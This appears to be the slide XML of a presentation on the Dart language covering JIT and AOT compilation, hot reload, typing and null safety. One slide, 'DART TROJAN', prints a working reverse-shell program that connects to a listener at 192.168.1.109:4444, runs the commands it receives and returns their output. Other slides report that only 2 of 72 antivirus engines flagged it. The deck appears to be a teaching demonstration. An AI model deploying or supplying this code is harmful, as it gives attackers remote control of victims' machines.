              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="117647"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Just in Time + Ahead of  Time compiler </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-312261" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1700"/>
              <a:t>Hot reload feature</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-332814" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="117647"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strong typing (Variable types known before runtime)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-332814" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="117647"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Null safe (Nullable variables must be declared with ? symbol)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-332814" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="117647"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Feature rich (Extensive libraries)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="A screenshot of a computer&#10;&#10;Description automatically generated" id="67" name="Google Shape;67;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20437" l="7969" r="36952" t="25147"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716929" y="1880129"/>
            <a:ext cx="3714749" cy="195433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a0d279bb21_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857251" y="885826"/>
            <a:ext cx="4286100" cy="21243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SzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DART TROJAN </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;g2a0d279bb21_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425175" y="190050"/>
            <a:ext cx="6610800" cy="4659600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>import 'dart:convert';</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void main() async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var host = '192.168.1.109'; // Malicious server IP address</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var port = 4444; // Malicious server listening port</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  var socket = await Socket.connect(host, port);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    // Listen for commands from the attacking server</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    socket.listen((data) async {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    var command = utf8.decode(data).trim();</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    // Execute the command and send the output back to the server</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    var result = await Process.run('cmd', ['/c', command]); // For Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    // var result = await Process.run('bash', ['-c', command]); // For Unix/Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    socket.write(result.stdout);</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>    }); </a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;g2a0d279bb21_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6488750" y="4076250"/>
            <a:ext cx="2431800" cy="7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rPr>
              <a:t>Dart t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rojan </a:t>
            </a:r>
            <a:endParaRPr sz="2800">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a0d279bb21_0_13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932600" y="344700"/>
            <a:ext cx="3492600" cy="140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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flagged by windows defender after compiling with dart2native</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="271" name="Google Shape;271;g2a0d279bb21_0_13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="17334" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-59462" y="-70550"/>
            <a:ext cx="9262913" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;g2a0d279bb21_0_13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159950" y="1054950"/>
            <a:ext cx="3774600" cy="15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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flagged by 2/72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virus programs when submitted to VirusTotal</a:t>
            </a:r>
            <a:endParaRPr sz="22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g2a0d279bb21_0_18" title="2023-11-26 15-36-17.mkv">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51233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a0d279bb21_1_9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Conclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;g2a0d279bb21_1_92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="382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Dart is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>powerful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> language with many potentials.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross-platform)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Best suited for application-level development.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Not typically used for low-level/systems programming.</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Garbage collection in dart removes the user’s full control.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lacks the facilities for low-level memory manipulation and direct hardware access which are necessary for systems programming.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Alternatives for systems programming:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C/C++</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Rust</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Assembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;g2a0d279bb21_1_9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a0d279bb21_0_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rPr lang="en-GB"/>
              <a:t>Ευχαριστούμε για την προσοχή σας!</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2a0d279bb21_1_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Just in time(JIT) compilation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;73;g2a0d279bb21_1_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7395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GB"/>
              <a:t>Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> Process of compiling code into machine code at runtime, rather than prior to execution.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>In Dart: Primarily used during development. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Allows for faster development cycles because the changes in code can be compiled and reflected immediately without the need for recompiling the entire application.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Compilation creates intermediate code and then into native code at run time.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="343541"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;g2a0d279bb21_1_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2a0d279bb21_1_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Hot reload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;g2a0d279bb21_1_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4023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One of the most notable features enabled by JIT is the hot reload in Flutter.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Allows developers to see the changes in their code almost instantly in the running application, without losing the application state</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;g2a0d279bb21_1_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pic>
        <p:nvPicPr>
          <p:cNvPr descr="A screenshot of a computer&#10;&#10;Description automatically generated" id="82" name="Google Shape;82;g2a0d279bb21_1_12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4394275" y="803050"/>
            <a:ext cx="4626874" cy="272215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a0d279bb21_1_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Ahead of time </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;g2a0d279bb21_1_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3803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Opposite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> of JIT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Compilation happens once before the application is launched.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Compiled directly into native machine code for the specific platform architecture.</a:t>
            </a:r>
            <a:endParaRPr/>
